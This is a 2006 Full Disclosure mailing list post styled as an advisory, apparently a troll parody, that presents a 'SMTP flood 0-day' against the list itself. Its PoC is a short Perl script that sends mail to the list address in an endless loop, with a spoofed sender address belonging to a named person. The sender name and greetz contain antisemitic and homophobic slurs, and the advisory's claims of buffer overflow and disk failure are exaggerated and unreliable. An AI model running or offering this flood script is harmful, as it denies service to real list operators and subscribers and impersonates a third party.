Full Disclosure mailing list archives

Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit


From: "3 3" <nazijew () gmail com>
Date: Fri, 17 Mar 2006 17:27:49 -0500

Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day
Exploit

==========
1. Description
==========
It is possible to flood Full Disclosure Mailing List via the SMTP protocol,
causing possible buffer overflow, probable disk write failure, and definate
DoS.

==========
2. Solution
==========
The clear solution, as per Bantown security, is to moderate all mailing
lists for an until the ESMTP MTA developers can reach a better solution.

==========
3. History
==========
Mar 13, 2006 [+] Vendor Notification.
Mar 13, 2006 [+] Public Disclosure.

==========
4. PoC
==========
#!/usr/bin/perl
#
# SMTP FLOOD PoC
# by Jmax, Bantown Security, INC.
#
# greetz 2
# weev, hep, hugparty, bob, tosh, choob,
# krade, the church of jesus christ of latter-day saints,
# n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT,
# u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED.
use warnings;
use strict;
use Mail::Sendmail;
my %mail = (
         from => 'ge () linuxbox org',
         to => 'full-disclosure () lists grok org uk',
         subject => 'SMTP FLOOD PoC',
);
while (1) {
  sendmail(%mail);
}
==========
A. References
==========
RFC 821

==========
B. Contact
==========
Jmax, Bantown Security, INC. lolville () spam la
1-888-565-9428
GSAE GREM SSP-CNSA CAP SSCP
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: